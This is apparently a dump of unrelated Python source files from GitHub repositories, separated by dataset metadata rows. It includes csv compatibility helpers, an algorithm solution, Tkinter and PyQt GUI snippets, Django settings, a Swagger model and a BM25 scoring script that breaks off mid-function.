def csvDictWriter(file, fieldnames, encoding=None, delimiter=None, **kwargs):
''' Pass encoding to unicodecsv
'''
# Python2 unicodecsv requires this be not unicode
if delimiter is not None:
kwargs['delimiter'] = delimiter.encode('ascii')
if encoding is not None:
kwargs['encoding'] = encoding
return unicodecsv.DictWriter(file, fieldnames, **kwargs)
def csvopen(filename, mode='r', encoding=None):
''' Discard encoding
'''
return io.FileIO(filename, mode=mode)
def expand_uri(template, args):
'''
'''
new_args = {k: v for (k, v) in args.items() if not hasattr(v, 'encode')}
new_args.update({k: v.encode('utf8') for (k, v) in args.items() if hasattr(v, 'encode')})
return uritemplate.expand(template, new_args)
from future import standard_library
standard_library.install_aliases()
else:
import csv, subprocess
from uritemplate import expand as expand_uri
standard_library = None
check_output = subprocess.check_output
CalledProcessError = subprocess.CalledProcessError
TimeoutExpired = subprocess.TimeoutExpired
csvIO = io.StringIO
def csvreader(file, encoding=None, **kwargs):
''' Discard encoding
'''
if 'delimiter' in kwargs:
kwargs['delimiter'] = str(kwargs['delimiter'])
return csv.reader(file, **kwargs)
def csvwriter(file, encoding=None, **kwargs):
''' Discard encoding
'''
return csv.writer(file, **kwargs)
def csvDictReader(file, encoding=None, **kwargs):
''' Discard encoding
'''
return csv.DictReader(file, **kwargs)
def csvDictWriter(file, fieldnames, encoding=None, **kwargs):
''' Discard encoding
'''
return csv.DictWriter(file, fieldnames, **kwargs)
def csvopen(filename, mode='r', encoding=None):
''' Pass encoding to io.open
'''
return io.open(filename, mode=mode, encoding=encoding)
try:
import cairo
except ImportError:
# http://stackoverflow.com/questions/11491268/install-pycairo-in-virtualenv
import cairocffi as cairo
| [
"[email protected]"
] | |
d680686b38adb8e9cdfc5bf3e14016b01354af3a | d1c6de4e0d4aafbe1e7d15a02487494f86bf9b7e | /알고리즘문제/내려가기.py | 1515a653c108bd21017b437c35fc3fc9e25479c1 | [] | no_license | kdm604/TIL | d2ce2122e0b828a595530ac2a405a4661cf60205 | 554bbd8e884f4e7fbebdefbfa22a1a5eee0fa452 | refs/heads/master | 2023-01-11T21:41:57.845549 | 2020-03-24T08:55:10 | 2020-03-24T08:55:10 | 195,938,033 | 0 | 0 | null | 2023-01-05T01:14:37 | 2019-07-09T05:23:00 | Python | UTF-8 | Python | false | false | 903 | py | import sys
N = int(input())
ans_max = [[0 for _ in range(3)]for _ in range(2)]
ans_min = [[0 for _ in range(3)]for _ in range(2)]
for i in range(1, N+1):
arr = list(map(int, sys.stdin.readline().split()))
ans_max[i % 2][0] = max(ans_max[(i -1)%2][0], ans_max[(i-1) %2][1]) + arr[0]
ans_max[i % 2][1] = max(ans_max[(i - 1) % 2][0], ans_max[(i - 1) % 2][1], ans_max[(i - 1) % 2][2]) + arr[1]
ans_max[i % 2][2] = max(ans_max[(i - 1) % 2][1], ans_max[(i - 1) % 2][2]) + arr[2]
ans_min[i % 2][0] = min(ans_min[(i - 1) % 2][0], ans_min[(i - 1) % 2][1]) + arr[0]
ans_min[i % 2][1] = min(ans_min[(i - 1) % 2][0], ans_min[(i - 1) % 2][1], ans_min[(i - 1) % 2][2]) + arr[1]
ans_min[i % 2][2] = min(ans_min[(i - 1) % 2][1], ans_min[(i - 1) % 2][2]) + arr[2]
print(max(ans_max[N%2][0], ans_max[N%2][1], ans_max[N%2][2]))
print(min(ans_min[N%2][0], ans_min[N%2][1], ans_min[N%2][2])) | [
"[email protected]"
] | |
8f3cc002c398732246f1e2d85326681bd76a8411 | c5a8f6dd4e5ebc43f02923704325620f0787b2f4 | /visual-experiments/rectangular_visualizer.py | 657afe5661a8fb7256dba49930c2c02daf9a6eec | [] | no_license | alex-berman/tforms | 50098501d19de75632426423d02025162bbc94e6 | 046476001609dfa8192c2e373a040d4129975ab6 | refs/heads/master | 2021-01-01T20:00:00.381901 | 2014-03-16T13:44:09 | 2014-03-16T13:44:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 936 | py | import visualizer
from visualizer import File, run
from vector import DirectionalVector, Vector2d
import math
class Chunk:
def peer_position(self):
return Visualizer.bearing_to_border_position(
self.peer.bearing, self.visualizer.width, self.visualizer.height)
class Segment(visualizer.Segment, Chunk):
pass
class Peer(visualizer.Peer):
pass
class Visualizer(visualizer.Visualizer):
@staticmethod
def bearing_to_border_position(bearing, width, height):
radius = math.sqrt(width*width + height*height) / 2
midpoint = Vector2d(width/2, height/2)
circle_position = midpoint + DirectionalVector(bearing - 2*math.pi/4, radius)
return circle_position
def pan_segment(self, segment):
relative_x = segment.pan
space_y = 3
space_x = (relative_x - 0.5) * 5
self.orchestra.place_segment(segment.id, space_x, space_y, segment.duration)
| [
"[email protected]"
] | |
042476a02c8bf29a0201454a2168abe364601a48 | a67d999deafb7d3dac60ad95f66234fe3e79030e | /Python/Advanted/src/chauthoi/myGUItest1.py | 3a9a1c4fe3d7059a5e5b5415c33d5c352348e5ae | [] | no_license | tielse/Example_Python | 1282728a3e38725a48f30a1c49a688b5262be485 | 0bc31f86f16ef98cf3b7ad8a524c27978e47775f | refs/heads/master | 2021-01-02T22:36:58.866922 | 2017-08-04T15:25:17 | 2017-08-04T15:25:17 | 99,355,643 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | #!/usr/bin/env python 2.7
import Tkinter
from Tkinter import *
Widget=Label(None,text='Hello Python')
Widget.pack()
Widget.mainloop() | [
"[email protected]"
] | |
7a15d93ffe5208e8afe7da36fd5f11f27c9fd337 | 59e8a041435b70f1dfb2464ccef298c69cf8466e | /058_Length_of_Last_Word/tests.py | 22dd861ca481516c780a5c55fa2454e7d4fdcbd3 | [] | no_license | sallowdish/LeetCode | f0aa6c5be864711c75a3583f320ce967d50c55d3 | d12ca00f30a1784802f42f8e76f782d7b72e95a6 | refs/heads/master | 2021-01-21T04:32:02.351940 | 2016-06-25T00:12:22 | 2016-06-25T00:12:22 | 33,152,440 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,072 | py | #!/usr/bin/python3
from unittest import TestCase, main
from sol1 import Solution
def split(n):
l = []
for i in n:
l.append(list(i))
return l
class Test(TestCase):
sol = None
def setUp(self):
self.sol = Solution()
def test0(self):
n = ""
self.assertEqual(self.sol.lengthOfLastWord(n) ,0)
def test1(self):
n = " "
self.assertEqual(self.sol.lengthOfLastWord(n) ,0)
def test2(self):
n = " a"
self.assertEqual(self.sol.lengthOfLastWord(n) ,1)
def test3(self):
n = " ab"
self.assertEqual(self.sol.lengthOfLastWord(n) ,2)
def test4(self):
n = " aVb "
self.assertEqual(self.sol.lengthOfLastWord(n) ,3)
def test5(self):
n = " ab IUHB POQPEQJ83894e2"
self.assertEqual(self.sol.lengthOfLastWord(n) ,len("POQPEQJ83894e2"))
if __name__ == "__main__":
# logging.basicConfig( stream=sys.stderr )
# logging.getLogger( "Test.testSomething" ).setLevel( logging.DEBUG )
main()
| [
"[email protected]"
] | |
dcf94f3467263d06f0cdc6a6fd45814921ae79cf | 1e9c9f2a9639db7cdb032aae69cb4d99aef1d3a5 | /hackerEarth/practice/dataStructures/advancedDataStructures/segmentTrees/researchOnNumbers.py | cd843193b38d663316dbb8d7bec57cc27e97e182 | [
"MIT"
] | permissive | sagarnikam123/learnNPractice | f0da3f8acf653e56c591353ab342765a6831698c | 1b3b0cb2cff2f478006626a4c37a99102acbb628 | refs/heads/master | 2023-02-04T11:21:18.211654 | 2023-01-24T14:47:52 | 2023-01-24T14:47:52 | 61,184,927 | 2 | 1 | MIT | 2022-03-06T11:07:18 | 2016-06-15T06:57:19 | Python | UTF-8 | Python | false | false | 2,349 | py | # Research on Numbers
#######################################################################################################################
#
# Bob is studying in a research institute. He is currently researching on integer sequences. He has already done
# some research on famous fibonacci sequence. Now he is trying to investigate patterns
# in a general recursive sequence (Ai)
# Sequence (Ai) is
# Ai = Bi (for i <= k)
# Ai = C1 * Ai-1 + C2 * Ai-2 +.......+ Ck*Ai-k (for i > k)
#
# But while calculating the sequence he realizes that values are growing very fast. So to keep the values small
# he calculates values modulo 109+7 (1000000007) . So that each term of sequence will be less than 109+7.
# While he is busy with his work, his girlfriend is disturbing him a lot. He wants to make her busy with some task.
# He gives her the task of sorting all the terms from Al to Ar of his sequence. She is very quick so he gives
# her same task Q times (of course with different l and r). Since sorting is very boring task so she asks you
# to complete the task.
# You will be given two numbers l and r and you are expected to output all the terms from Al to Ar in non
# decreasing order. But to avoid such a large output, if there are more than 100 terms
# in the output print only first 100.
#
# Input :
# First line contains T, the number of test cases. First line of each test case contains two space separated
# integers Q and k. Next line contains array B of length k. 3rd line contains array C of length k.
# Each of next Q lines contains two space separated integers l and r.
#
# Output :
# For each test case output Q lines. Each line contains terms from Al to Ar in non decreasing order.
# If more than 100 terms are there to output,print only first 100
#
# Constraints :
# 1 <= T <= 3
# 1 <= Q <= 100
# 1 <= k <= 5
# 1 <= Bj,Cj <= 50
# 1 <= l,r <= 10^6
# l <= r
#
# SAMPLE INPUT
# 2
# 4 3
# 1 2 3
# 2 1 1
# 1 5
# 6 8
# 8 9
# 6 9
# 3 4
# 4 5 7 9
# 2 2 1 3
# 2 7
# 10 12
# 100 101
#
# SAMPLE OUTPUT
# 1 2 3 9 23
# 58 148 377
# 377 960
# 58 148 377 960
# 5 7 9 49 138 404
# 9964 29126 85073
# 483689722 905484679
#
#######################################################################################################################
| [
"[email protected]"
] | |
61bdf96e9e66babc6af5fbb50dce07eacb4d3e7e | b804260baffde6044d0da699ebd01eefd5524897 | /tests/loss/test_loss.py | db2c74e8c2f0e1a7ffec9783b81e8edcb95589ba | [
"MIT"
] | permissive | pfnet/pynif3d | d8112e659c3158cd87f4f88ebb77c653c2a0eb7c | da3680cce7e8fc4c194f13a1528cddbad9a18ab0 | refs/heads/main | 2023-07-15T06:27:27.849842 | 2021-08-18T07:15:13 | 2021-08-18T07:15:13 | 397,141,414 | 72 | 5 | MIT | 2021-08-18T07:15:14 | 2021-08-17T06:53:45 | Python | UTF-8 | Python | false | false | 533 | py | from unittest import TestCase
import torch
from pynif3d.loss import eikonal_loss
class TestLoss(TestCase):
def test_eikonal_loss(self):
x = torch.as_tensor(
[
[0.2936261892, -1.0289776325, 0.1445489526],
[-0.2577984035, -0.7820385098, 0.3506951332],
[-0.4243153632, 0.8669579029, -0.6295363903],
]
)
loss = float(eikonal_loss(x))
expected_loss = 0.0135356029
self.assertAlmostEqual(loss, expected_loss, places=5)
| [
"[email protected]"
] | |
75f86cfb2964f955c6eb729325f89b994094d90b | 4e27edeea65ccbf56751ce8d2dc77a7133b0acd4 | /manage.py | 67c6cd2430e82991dd181c57036a89165333e071 | [] | no_license | TheFifthMan/whitehat | f1e6faf39c7e56d79ac462de4de847ebd531ecb1 | 944ff548ec18b2c306af63a53baff9940fdbec84 | refs/heads/master | 2020-04-08T18:40:27.924936 | 2018-11-29T06:37:13 | 2018-11-29T06:37:13 | 159,619,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 540 | py | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'whitehat.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"[email protected]"
] | |
1b4972c56701c6145e833481d3454ceb0bfc240a | 62980875b6e08d0099b1662fa3148ae29986fb64 | /BeautifulSoup/6_bs4.py | 898014028b10426db05bb94eb1a9f99b419b19ca | [] | no_license | kogkuemryong/Python_WebScraping- | 9db659c9a11c2677074fcac7f7029ec8541cb4f5 | 51cf7e7e71ce7c90b68f70daa43785671350dfb5 | refs/heads/master | 2022-12-12T17:01:27.142178 | 2020-09-08T16:48:19 | 2020-09-08T16:48:19 | 293,404,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,019 | py | import requests
from bs4 import BeautifulSoup
url ='https://comic.naver.com/webtoon/weekday.nhn'
res = requests.get(url) # url 를 읽음
res.raise_for_status() # 문제가 생기면 프로그램 종료를 시켜줌
soup = BeautifulSoup(res.text, 'lxml') # 텍스트 형태로 가져온 데이터를 lxml를 통해서
# BeautifulSoup 객체로 만든 것이다.
'''
해당 웹페이지를 잘 알 때 사용
print(soup.title) # <title>네이버 만화 > 요일별 웹툰 > 전체웹툰</title>
print(soup.title.get_text()) # 글자만 빼옴 / 네이버 만화 > 요일별 웹툰 > 전체웹툰
print(soup.a) # soup 전체에서 첫번째 a element 출력
print(soup.a.attrs) # a element의 속성 정보를 출력
print(soup.a['href']) # a element의 href 속성 '값' 정보를 출력`
'''
# print(soup.find('a', attrs={'class' :'Nbtn_upload'})) # class = 'Nbtn_upload' 인 a element를 찾아줘
# print(soup.find(attrs={'class' :'Nbtn_upload'})) # class = 'Nbtn_upload'인 어떤 element 를 찾아줘
# print(soup.find('li', attrs={'class':'rank01'}))
# rank1 = soup.find('li', attrs={'class':'rank01'})
# print(rank1.a.get_text()) # 글자만
# print (rank1.next_sibling) # 아무것도 출력 안됨
# rank2 = rank1.next_sibling.next_sibling # 형제 관계로 넘어가게 해준다.
# rank3 = rank2.next_sibling.next_sibling
# rank4 = rank3.next_sibling.next_sibling
# print(rank4.get_text())
# rank2 = rank3.previous_sibling.previous_sibling # 이전으로 가기
# print(rank1.parent) # 부모로 가기
# rank2 = rank1.find_next_sibling('li')
# print(rank2.a.get_text()) # next.sibling 을 여러번 사용하게 될 때 대신하여 유용하게 사용.
#
# rank3 = rank2.find_next_sibling('li')
# print(rank3.a.get_text())
#
# rank2 = rank3.find_previous_sibling('li')
# print(rank2.a.get_text())
# print (rank1.find_next_siblings('li'))
webtooon = soup.find('a' , text = '인생존망-43화 : 너 뽀뽀하려고 그랬지!!!')
print(webtooon)
| [
"[email protected]"
] | |
2520da0ffe6d528d917b6d76d7e86d7767ae8d15 | 8f4488494507da4cb6f15073b8aa2e6f97fabb35 | /test/integration/local/test_tensorflow.py | c85f8f5d446253c4b38bdc7e634c6851379fd0e4 | [
"Apache-2.0"
] | permissive | aws/sagemaker-training-toolkit | 025966a1216aeb78b58f7abab19c6ccb01b0897d | e4a765e699e16c5849bbdfd789edbfc9820fdd77 | refs/heads/master | 2023-08-21T12:33:59.831391 | 2023-08-08T16:46:40 | 2023-08-08T16:46:40 | 212,439,434 | 415 | 110 | Apache-2.0 | 2023-09-07T19:58:23 | 2019-10-02T20:54:32 | Python | UTF-8 | Python | false | false | 1,528 | py | # Copyright 2022 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import subprocess
import sys
import pytest
from sagemaker.estimator import Estimator
@pytest.fixture(scope="module", autouse=True)
def container():
try:
command = (
"docker run --name sagemaker-training-toolkit-test "
"sagemaker-training-toolkit-test:tensorflow train"
)
proc = subprocess.Popen(command.split(), stdout=sys.stdout, stderr=subprocess.STDOUT)
yield proc.pid
finally:
subprocess.check_call("docker rm -f sagemaker-training-toolkit-test".split())
def test_tensorflow_exceptions(capsys):
with pytest.raises(Exception):
estimator = Estimator(
image_uri="sagemaker-training-toolkit-test:tensorflow",
role="SageMakerRole",
instance_count=1,
instance_type="local",
)
estimator.fit()
stdout = capsys.readouterr().out
assert "XlaRuntimeError" in stdout
| [
"[email protected]"
] | |
538432edd63d9503879fed091c2da849b88aeb19 | d7ccb4225f623139995a7039f0981e89bf6365a4 | /.history/mall/settings_20211011171802.py | d6ac69d215da3f819a7996e8f1d92e8ab5d563bf | [] | no_license | tonnymuchui/django-mall | 64fd4abc3725c1bd0a3dcf20b93b490fe9307b37 | 55c083d8433be3c77adc61939cd197902de4ce76 | refs/heads/master | 2023-08-23T04:59:20.418732 | 2021-10-13T15:59:37 | 2021-10-13T15:59:37 | 415,668,388 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,642 | py | """
Django settings for mall project.
Generated by 'django-admin startproject' using Django 3.2.5.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
TEMPLATE_DIR = os.path.join(BASE_DIR,"templates")
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-#l0ij4e$3v@&xi3i#y$19f#_@z(yv+5yw$kc+02!-)g%ny%oi8'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'category',
'accounts',
'store',
'carts'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mall.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR,],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'category.context_processors.menu_links',
'cart.cont'
],
},
},
]
WSGI_APPLICATION = 'mall.wsgi.application'
AUTH_USER_MODEL = 'accounts.Account'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = BASE_DIR /'static'
STATICFILES_DIRS = [
'mall/static',
]
# media files configuration
MEDIA_URL = '/media/'
MEDIA_ROOT = BASE_DIR /'media'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"[email protected]"
] | |
2ea6a54e6d5e934338510fc52ec20c0e4d55851c | ce6cb09c21470d1981f1b459293d353407c8392e | /docs/jnpr_healthbot_swagger/swagger_client/models/rule_schema_formula1_or.py | 71314684086751f0563ed538b08bac277bdc9834 | [
"Apache-2.0"
] | permissive | minefuto/healthbot-py-client | c4be4c9c3153ef64b37e5344bf84154e93e7b521 | bb81452c974456af44299aebf32a73abeda8a943 | refs/heads/master | 2022-12-04T07:47:04.722993 | 2020-05-13T14:04:07 | 2020-05-13T14:04:07 | 290,145,286 | 0 | 0 | Apache-2.0 | 2020-08-25T07:27:54 | 2020-08-25T07:27:53 | null | UTF-8 | Python | false | false | 5,021 | py | # coding: utf-8
"""
Healthbot APIs
API interface for Healthbot application # noqa: E501
OpenAPI spec version: 1.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class RuleSchemaFormula1Or(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'left_vector': 'str',
'right_vector': 'str'
}
attribute_map = {
'left_vector': 'left-vector',
'right_vector': 'right-vector'
}
def __init__(self, left_vector=None, right_vector=None): # noqa: E501
"""RuleSchemaFormula1Or - a model defined in Swagger""" # noqa: E501
self._left_vector = None
self._right_vector = None
self.discriminator = None
self.left_vector = left_vector
self.right_vector = right_vector
@property
def left_vector(self):
"""Gets the left_vector of this RuleSchemaFormula1Or. # noqa: E501
Vector name. Pattern for giving vector name is @[a-z][a-zA-Z0-9_-]* # noqa: E501
:return: The left_vector of this RuleSchemaFormula1Or. # noqa: E501
:rtype: str
"""
return self._left_vector
@left_vector.setter
def left_vector(self, left_vector):
"""Sets the left_vector of this RuleSchemaFormula1Or.
Vector name. Pattern for giving vector name is @[a-z][a-zA-Z0-9_-]* # noqa: E501
:param left_vector: The left_vector of this RuleSchemaFormula1Or. # noqa: E501
:type: str
"""
if left_vector is None:
raise ValueError("Invalid value for `left_vector`, must not be `None`") # noqa: E501
if left_vector is not None and not re.search(r'^@[a-z][a-zA-Z0-9_-]*$', left_vector): # noqa: E501
raise ValueError(r"Invalid value for `left_vector`, must be a follow pattern or equal to `/^@[a-z][a-zA-Z0-9_-]*$/`") # noqa: E501
self._left_vector = left_vector
@property
def right_vector(self):
"""Gets the right_vector of this RuleSchemaFormula1Or. # noqa: E501
Vector name. Pattern for giving vector name is @[a-z][a-zA-Z0-9_-]* # noqa: E501
:return: The right_vector of this RuleSchemaFormula1Or. # noqa: E501
:rtype: str
"""
return self._right_vector
@right_vector.setter
def right_vector(self, right_vector):
"""Sets the right_vector of this RuleSchemaFormula1Or.
Vector name. Pattern for giving vector name is @[a-z][a-zA-Z0-9_-]* # noqa: E501
:param right_vector: The right_vector of this RuleSchemaFormula1Or. # noqa: E501
:type: str
"""
if right_vector is None:
raise ValueError("Invalid value for `right_vector`, must not be `None`") # noqa: E501
if right_vector is not None and not re.search(r'^@[a-z][a-zA-Z0-9_-]*$', right_vector): # noqa: E501
raise ValueError(r"Invalid value for `right_vector`, must be a follow pattern or equal to `/^@[a-z][a-zA-Z0-9_-]*$/`") # noqa: E501
self._right_vector = right_vector
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(RuleSchemaFormula1Or, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, RuleSchemaFormula1Or):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
4c0d4d4150b62d2151f73bd99f474cc1fcdc41af | e01dde12be71c40065a9d6d2b1451f837c42a41e | /py_trees_ros_viewer/viewer.py | 754f696ee24634ae00238eb788ed5305d7f1e131 | [
"BSD-3-Clause"
] | permissive | neelj09/py_trees_ros_viewer | 29336ce5a7f7592ffb67c0170b42902d16fea5d3 | 1fbd7877fa4bcb53119b3111db26ce87ec8ccebd | refs/heads/master | 2022-04-09T00:48:10.260221 | 2019-08-10T02:54:03 | 2019-08-10T02:54:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,833 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# License: BSD
# https://github.com/splintered-reality/py_trees_ros_viewer/raw/devel/LICENSE
#
##############################################################################
# Documentation
##############################################################################
"""
A qt-javascript application for viewing executing or replaying py_trees
"""
##############################################################################
# Imports
##############################################################################
import functools
import json
import signal
import sys
import time
import PyQt5.QtCore as qt_core
import PyQt5.QtWidgets as qt_widgets
from . import console
from . import trees
from . import main_window
##############################################################################
# Helpers
##############################################################################
def send_tree_response(reply):
console.logdebug("reply: '{}' [viewer]".format(reply))
@qt_core.pyqtSlot()
def send_tree(web_view_page, demo_trees, unused_checked):
send_tree.index = 0 if send_tree.index == 2 else send_tree.index + 1
demo_trees[send_tree.index]['timestamp'] = time.time()
console.logdebug("send: tree '{}' [{}][viewer]".format(
send_tree.index, demo_trees[send_tree.index]['timestamp'])
)
web_view_page.runJavaScript(
"render_tree({tree: '%s'});" % json.dumps(demo_trees[send_tree.index]),
send_tree_response
)
send_tree.index = 0
##############################################################################
# Main
##############################################################################
def main():
# logging
console.log_level = console.LogLevel.DEBUG
# the players
app = qt_widgets.QApplication(sys.argv)
demo_trees = trees.create_demo_tree_list()
window = main_window.MainWindow(
default_tree=demo_trees[0]
)
# sig interrupt handling
# use a timer to get out of the gui thread and
# permit python a chance to catch the signal
# https://stackoverflow.com/questions/4938723/what-is-the-correct-way-to-make-my-pyqt-application-quit-when-killed-from-the-co
def on_shutdown(unused_signal, unused_frame):
console.logdebug("received interrupt signal [viewer]")
window.close()
signal.signal(signal.SIGINT, on_shutdown)
timer = qt_core.QTimer()
timer.timeout.connect(lambda: None)
timer.start(250)
# sigslots
window.ui.send_button.clicked.connect(
functools.partial(
send_tree,
window.ui.web_view_group_box.ui.web_engine_view.page(),
demo_trees
)
)
# qt bringup
window.show()
result = app.exec_()
# shutdown
sys.exit(result)
| [
"[email protected]"
] | |
15bd7e332a59184de848af3cc92208ff3dcc0330 | 7d1e9acf94a5e4533d3ef5828b568e89c29519a3 | /11-Message Box/MessageBox.py | a6e635c724e37df0204a8b500c9173b5d056455a | [] | no_license | abuzarrizvi/Python-GUI-s-With-TKinter | c960e3629589d25b72f6720caebb552352e77976 | d5c7843cdd3203294762ae92b6503ecb55d083f1 | refs/heads/master | 2020-07-06T03:17:56.798236 | 2019-08-23T10:56:41 | 2019-08-23T10:56:41 | 202,871,347 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | from tkinter import *
from PIL import ImageTk, Image
from tkinter import messagebox
root = Tk()
root.title('Learn To Code at Github.com')
root.iconbitmap('Martz90-Circle-Camera.ico')
#showinfo, showwarning, showerror, askquestion, askokcancel, askyesno
def popup():
response = messagebox.showerror("This is my Popup!", "Hello World!")
Label(root, text=response).pack()
#if response == "yes":
# Label(root, text="You Clicked Yes! ").pack()
#else:
# Label(root, text="You Clicked No! ").pack()
Button(root, text="Popup", command=popup).pack()
root.mainloop()
| [
"[email protected]"
] | |
728c81d8394209a41c9c13be78e81117b4680432 | 250e692078234b0e3ef22ad20ab7168f807d1d5f | /diagonal_matrix.py | 08b03ebc30dd750a07341d1b062de7ee30082f1c | [] | no_license | AnTznimalz/python_prepro | 694338609985971c5e6eaf8ec463c2a5c62dd836 | bdc1e49fa03704bebcf2ab69a4c1600e4cd46a74 | refs/heads/master | 2022-06-22T23:47:28.396580 | 2020-05-07T15:07:56 | 2020-05-07T15:07:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 342 | py | """ Diagonal Matrix"""
def mat():
""" Func. mat for calculate matrix """
dim = int(input())
box = list()
a, b = 0, 0
for n in range(dim):
lst = input().split()
box.append(lst)
lst = []
for i in range(dim):
a += int(box[i][i])
b += int(box[i][dim-i-1])
print(abs(a-b))
mat()
| [
"[email protected]"
] | |
fc32cea9c83b3dc402ab49fd5e934718e734f48c | 5b221c2809d82cf13a2b24a56589943315cdb381 | /2018/2018-29.py | e953d3c14398aab0d4b63f6a0705c7cf5486abfc | [] | no_license | Bruce-V/CS-BM25 | c2cd797e9be2fc55af9c8944882fd55109ebee61 | 2401f0ddb24c1712b13c0c96e13565f60d48705d | refs/heads/main | 2023-01-04T23:29:20.906427 | 2020-11-09T08:44:22 | 2020-11-09T08:44:22 | 259,228,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,714 | py | # Copyright 2020 zicheng Zhang([email protected])
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pymongo
import re
from math import log
myclient =pymongo.MongoClient("mongodb://localhost:27017/")
mydb = myclient["pubmed"]
mywords = mydb["freqwords3"] #pubmed中所有的词频、化学词、关键词和主题词表
mytopic=mydb["topics2018"]#pubmed中的主题词相关文献列表
mypapers=mydb["papers"]#pubmed中文献信息表
mytopicdb=myclient["cs2018_29"]
mydata=mytopicdb["cs2018_score_29"]#按词表长度改进过后的2次排序表
mycount = mytopicdb["cs2018_score_29_related"]#聚类后对应与主题相关联的文献
def sortsecond(myfreq,mydata,yuzhi):
k = 0
k1=1.2
k2=1.2
b1=0.75
b2=0.75
idf_esophageal = log((29138919 - 32358 + 0.5) / (32358 + 0.5), 10)
